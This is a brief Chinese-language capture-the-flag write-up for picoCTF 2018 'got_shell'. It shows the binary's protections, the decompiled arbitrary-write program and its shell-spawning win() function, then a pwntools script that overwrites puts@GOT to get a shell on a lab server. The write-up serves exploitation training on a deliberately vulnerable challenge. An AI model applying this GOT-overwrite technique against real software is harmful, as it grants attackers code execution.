picoctf_2018_got_shell
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
32位,只开了NX
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{_DWORD *v3; // [esp+14h] [ebp-114h]int v4; // [esp+18h] [ebp-110h]char s; // [esp+1Ch] [ebp-10Ch]unsigned int v6; // [esp+11Ch] [ebp-Ch]v6 = __readgsdword(0x14u);setvbuf(_bss_start, 0, 2, 0);puts("I'll let you write one 4 byte value to memory. Where would you like to write this 4 byte value?");__isoc99_scanf("%x", &v3);sprintf(&s, "Okay, now what value would you like to write to 0x%x", v3);puts(&s);__isoc99_scanf("%x", &v4);sprintf(&s, "Okay, writing 0x%x to 0x%x", v4, v3);puts(&s);*v3 = v4;puts("Okay, exiting now...\n");exit(1);
}
int win()
{return system("/bin/sh");
}
有后门函数,并且主函数,是更改地址的程序
思路
最后有使用puts,(或者改exit都可以),更改puts@got–>win函数即可
from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",29972,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')sla(b'byte value?',hex(elf.got['puts']))
sla(b'like to write to',b'0x804854B')ia()